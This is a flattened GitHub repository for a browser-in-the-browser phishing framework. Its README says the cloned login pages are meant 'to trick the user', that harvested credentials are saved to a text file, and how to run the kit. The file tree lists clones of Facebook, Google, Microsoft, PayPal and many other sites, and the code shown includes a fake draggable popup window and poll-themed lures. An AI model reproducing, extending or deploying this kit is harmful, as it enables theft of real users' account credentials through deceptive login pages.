├── .gitattributes ├── README.md ├── bitb.py ├── index.html ├── main.html ├── requirements.txt ├── script.js ├── sites ├── adobe │ ├── index.php │ ├── login.html │ └── login.php ├── badoo │ ├── index.php │ ├── login.html │ └── login.php ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php ├── dropbox │ ├── dropbox1.png │ ├── dropbox2.png │ ├── dropbox3.png │ ├── dropbox4.svg │ ├── dropbox5.svg │ ├── dropbox6.svg │ ├── index.php │ ├── login.html │ └── login.php ├── ebay │ ├── index.php │ ├── login.html │ └── login.php ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png ├── linkedin │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── mediafire │ ├── index.php │ ├── login.html │ └── login.php ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ └── sdk.js ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── index.php │ ├── login.html │ └── login.php ├── pinterest │ ├── index.php │ ├── login.php │ └── signin.php ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html ├── snapchat │ ├── index.php │ ├── login.php │ └── users.php ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css ├── stackoverflow │ ├── index.php │ ├── login.html │ └── login.php ├── steam │ ├── index.php │ ├── login.html │ └── login.php ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── index.php │ ├── login.php │ └── user.php ├── twitter │ ├── index.php │ ├── login.html │ └── login.php ├── userpass │ └── usernames.txt ├── vk │ ├── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download │ ├── b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download │ ├── common.6d5af9c51c7e29087e36.js.download │ ├── common.css │ ├── counter │ ├── index.php │ ├── login.html │ ├── login.php │ ├── p │ ├── polyfills.c5f9a2ced681ad88809a.js.download │ └── vendors.2773b57485e379f375b2.js.download ├── vk_poll │ ├── counter.gif │ ├── hit.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── p.gif │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ ├── s_z.js │ └── top_logo.png ├── wordpress │ ├── index.php │ ├── load-styles.css │ ├── login.html │ ├── login.php │ └── wordpress-logo.svg ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php ├── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png └── yandex │ ├── adobe │ ├── index.php │ ├── login.html │ └── login.php │ ├── badoo │ ├── index.php │ ├── login.html │ └── login.php │ ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php │ ├── dropbox │ ├── dropbox1.png │ ├── dropbox2.png │ ├── dropbox3.png │ ├── dropbox4.svg │ ├── dropbox5.svg │ ├── dropbox6.svg │ ├── index.php │ ├── login.html │ └── login.php │ ├── ebay │ ├── index.php │ ├── login.html │ └── login.php │ ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css │ ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html │ ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php │ ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css │ ├── github │ ├── index.php │ ├── login.html │ └── login.php │ ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php │ ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php │ ├── google_new │ ├── index.php │ ├── login.html │ └── login.php │ ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html │ ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php │ ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html │ ├── index.php │ ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php │ ├── instagram │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png │ ├── linkedin │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html │ ├── login.html │ ├── login.php │ ├── mediafire │ ├── index.php │ ├── login.html │ └── login.php │ ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png │ ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ └── sdk.js │ ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js │ ├── paypal │ ├── index.php │ ├── login.html │ └── login.php │ ├── pinterest │ ├── index.php │ ├── login.php │ └── signin.php │ ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg │ ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js │ ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html │ ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html │ ├── snapchat │ ├── index.php │ ├── login.php │ └── users.php │ ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css │ ├── stackoverflow │ ├── index.php │ ├── login.html │ └── login.php │ ├── steam │ ├── index.php │ ├── login.html │ └── login.php │ ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css │ ├── twitch │ ├── index.php │ ├── login.php │ └── user.php │ ├── twitter │ ├── index.php │ ├── login.html │ └── login.php │ ├── vk │ ├── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download │ ├── b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download │ ├── common.6d5af9c51c7e29087e36.js.download │ ├── common.css │ ├── counter │ ├── index.php │ ├── login.html │ ├── login.php │ ├── p │ ├── polyfills.c5f9a2ced681ad88809a.js.download │ └── vendors.2773b57485e379f375b2.js.download │ ├── vk_poll │ ├── counter.gif │ ├── hit.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── p.gif │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ ├── s_z.js │ └── top_logo.png │ ├── wordpress │ ├── index.php │ ├── load-styles.css │ ├── login.html │ ├── login.php │ └── wordpress-logo.svg │ ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php │ └── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png ├── ssl.svg ├── style.css └── style2.css /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BITB-framwork 2 | 3 | # ✅ what is BITB attack ? 4 | **bitb stands for browser in the browser attack . it just a more of the advance phishing techniuqe used to phis the user making them belive that a new third party 5 | authentication windows is open . but it is just using ``tag from the html and with magic of some javascript and css , it makes more belivable. 6 | you can look at the image provided from mrd0x , to read more you can visit : https://mrd0x.com/browser-in-the-browser-phishing-attack/ ** 7 | 8 | ![image](https://user-images.githubusercontent.com/86433380/162735323-21cc0a85-ee0f-41b8-92ba-630416cd52b4.png) 9 | 10 | # ✅ note : 11 | - this framwork is composed of several popular site cloned pages , which are used to trick the user !! 12 | - one can modify the host webiste login page by adding custom html or css in `main.html` file !! 13 | - all the credential are found in sites/userpass/usernames.txt file !! 14 | - make sure you have php install on your system 15 | 16 | # ✅ how to run ? 17 | 18 | this framwork is fully guided , you just need to run `bitb.py` file. 19 | then just visit the localhost on `127.0.0.1:8080` 20 | you can contribute to this open source project . thank you 👍🙌🤗 21 | 22 | # ✅ screenshot of the framwork : 23 | 24 | ![image](https://user-images.githubusercontent.com/86433380/162841814-bb992b37-3d18-4cfe-a9ce-ba915127d65f.png) 25 | ![image](https://user-images.githubusercontent.com/86433380/162841831-55d366af-de50-4499-bdfb-47fdfab300fe.png) 26 | ![image](https://user-images.githubusercontent.com/86433380/162843225-18430620-a409-4184-810f-636e4736936c.png) 27 | 28 | 29 | # need to work on it to make it something really nice ! i know there are lots of bug currently !! 30 | # special thanks to : https://github.com/mrd0x/BITB 31 | # special thanks to : https://github.com/darkmidus/HiddenEye 32 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 28 | 29 | 30 | 31 | 32 | 33 |
34 |
35 |

LOGO

36 |
37 |

Welcome Back!

38 |

Every Day We Change The World
to change the world with us
login with your personal Info.

39 |
Subscribe
40 |
41 |
42 | 72 |
73 | 74 |
75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 110 | 111 | 112 | 113 | 114 | -------------------------------------------------------------------------------- /main.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 28 | 29 | 30 | 31 | 32 | 33 |
34 |
35 |

LOGO

36 |
37 |

Welcome Back!

38 |

Every Day We Change The World
to change the world with us
login with your personal Info.

39 |
Subscribe
40 |
41 |
42 | 72 |
73 | 74 |
75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 110 | 111 | 112 | 113 | 114 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | termcolor 2 | re -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | var minimize = document.getElementById("minimize"); 2 | var square = document.getElementById("square"); 3 | var exit = document.getElementById("exit"); 4 | var titleBar = document.getElementById("title-bar"); 5 | 6 | ////////////////// Hover listeners ////////////////// 7 | minimize.addEventListener('mouseover', function handleMouseOver() { 8 | minimize.style.backgroundColor = '#272727'; 9 | minimize.style.cursor = 'context-menu'; 10 | }); 11 | 12 | minimize.addEventListener('mouseout', function handleMouseOut() { 13 | minimize.style.backgroundColor = 'black'; 14 | minimize.style.cursor = 'default'; 15 | }); 16 | 17 | square.addEventListener('mouseover', function handleMouseOver() { 18 | square.style.backgroundColor = '#272727'; 19 | square.style.cursor = 'context-menu'; 20 | }); 21 | 22 | square.addEventListener('mouseout', function handleMouseOut() { 23 | square.style.backgroundColor = 'black'; 24 | square.style.cursor = 'default'; 25 | }); 26 | 27 | exit.addEventListener('mouseover', function handleMouseOver() { 28 | exit.style.backgroundColor = 'red'; 29 | exit.style.cursor = 'context-menu'; 30 | }); 31 | 32 | exit.addEventListener('mouseout', function handleMouseOut() { 33 | exit.style.backgroundColor = 'black'; 34 | exit.style.cursor = 'default'; 35 | }); 36 | 37 | titleBar.addEventListener('mouseover', function handleMouseOver() { 38 | titleBar.style.cursor = 'context-menu'; 39 | }); 40 | 41 | titleBar.addEventListener('mouseout', function handleMouseOver() { 42 | titleBar.style.cursor = 'default'; 43 | }); 44 | 45 | 46 | //////////////// Make window draggable start //////////////// 47 | // Make the DIV element draggable: 48 | var draggable = $('#window'); 49 | var title = $('#title-bar'); 50 | 51 | title.on('mousedown', function(e){ 52 | var dr = $(draggable).addClass("drag"); 53 | height = dr.outerHeight(); 54 | width = dr.outerWidth(); 55 | ypos = dr.offset().top + height - e.pageY, 56 | xpos = dr.offset().left + width - e.pageX; 57 | $(document.body).on('mousemove', function(e){ 58 | var itop = e.pageY + ypos - height; 59 | var ileft = e.pageX + xpos - width; 60 | if(dr.hasClass("drag")){ 61 | dr.offset({top: itop,left: ileft}); 62 | } 63 | }).on('mouseup', function(e){ 64 | dr.removeClass("drag"); 65 | }); 66 | }); 67 | //////////////// Make window draggable end //////////////// 68 | 69 | 70 | ////////////////// Onclick listeners ////////////////// 71 | // X button functionality 72 | $("#exit").click(function(){ 73 | $("#window").css("display", "none"); 74 | }); 75 | 76 | // Maximize button functionality 77 | $("#square").click(enlarge); 78 | 79 | function enlarge(){ 80 | if(square.classList.contains("enlarged")){ 81 | $("#window").css("width", "40%"); 82 | $("#title-bar-width").css('width', '100%').css('width', '+=2px'); 83 | $("#content").css("width", "100%"); 84 | $("#square").removeClass("enlarged"); 85 | } 86 | else{ 87 | $("#window").css("width", "70%"); 88 | $("#title-bar-width").css('width', '100%').css('width', '+=2px'); 89 | $("#content").css("width", "100%"); 90 | $("#square").addClass("enlarged"); 91 | } 92 | } 93 | 94 | 95 | //// Pop-up appear on click with delay //// 96 | $("#clickme").click(function(){ 97 | $("#window").fadeIn(300); 98 | }); -------------------------------------------------------------------------------- /sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/adobe/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/dropbox/dropbox1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/dropbox/dropbox1.png -------------------------------------------------------------------------------- /sites/dropbox/dropbox2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/dropbox/dropbox2.png -------------------------------------------------------------------------------- /sites/dropbox/dropbox3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/dropbox/dropbox3.png -------------------------------------------------------------------------------- /sites/dropbox/dropbox4.svg: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /sites/dropbox/dropbox5.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | Shape 4 | Created with Sketch. 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /sites/dropbox/dropbox6.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/dropbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sites/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [KasRoudra](https://github.com/KasRoudra) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit -------------------------------------------------------------------------------- /sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /sites/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_advanced/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /sites/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /sites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_messenger/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /sites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /sites/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/surya-dev-singh/BITB-framwork/c52a65598ef57985d0219e637ff12c76b1a2ad96/sites/fb_security/logo.png -------------------------------------------------------------------------------- /sites/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/gitlab/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/gitlab/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /sites/google/avatar.png: -------------------------------------------------------------------------------- 